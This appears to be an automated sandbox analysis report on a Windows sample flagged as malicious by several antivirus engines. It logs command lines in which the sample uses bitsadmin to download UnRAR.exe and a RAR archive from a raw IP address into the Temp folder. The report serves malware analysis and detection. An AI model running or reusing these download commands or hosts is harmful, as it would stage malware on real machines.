Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Nov. 29, 2024, 1:28 p.m. | Nov. 29, 2024, 1:31 p.m. |
-
-
PING.EXE ping -n 1 8.8.8.8
2068 -
bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\test22\AppData\Local\Temp\UnRAR.exe"
2148 -
bitsadmin.exe bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\test22\AppData\Local\Temp\letgrtsC1.rar"
2648
-
Suricata Alerts
Suricata TLS
No Suricata TLS
section | .ndata |
suspicious_features | Connection to IP address | suspicious_request | HEAD http://194.15.46.189/UnRAR.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://194.15.46.189/UnRAR.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://194.15.46.189/letgrtsC1.rar | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://194.15.46.189/letgrtsC1.rar |
request | HEAD http://194.15.46.189/UnRAR.exe |
request | GET http://194.15.46.189/UnRAR.exe |
request | HEAD http://194.15.46.189/letgrtsC1.rar |
request | GET http://194.15.46.189/letgrtsC1.rar |
file | C:\Users\test22\AppData\Local\Temp\nsoC187.tmp\nsExec.dll |
file | C:\Users\test22\AppData\Local\Temp\nsoC187.tmp\nsExec.dll |
Bkav | W32.AIDetectMalware |
Cylance | Unsafe |
CrowdStrike | win/malicious_confidence_60% (D) |
APEX | Malicious |
McAfeeD | ti!A34D38DFB286 |
Trapmine | malicious.moderate.ml.score |
Kingsoft | malware.kb.a.731 |
Microsoft | PUA:Win32/Caypnamer.A!ml |
DeepInstinct | MALICIOUS |
cmdline | ping -n 1 8.8.8.8 |
host | 194.15.46.189 | |||
host | 54.37.204.238 |
cmdline | bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\test22\AppData\Local\Temp\UnRAR.exe" |
cmdline | bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\test22\AppData\Local\Temp\letgrtsC1.rar" |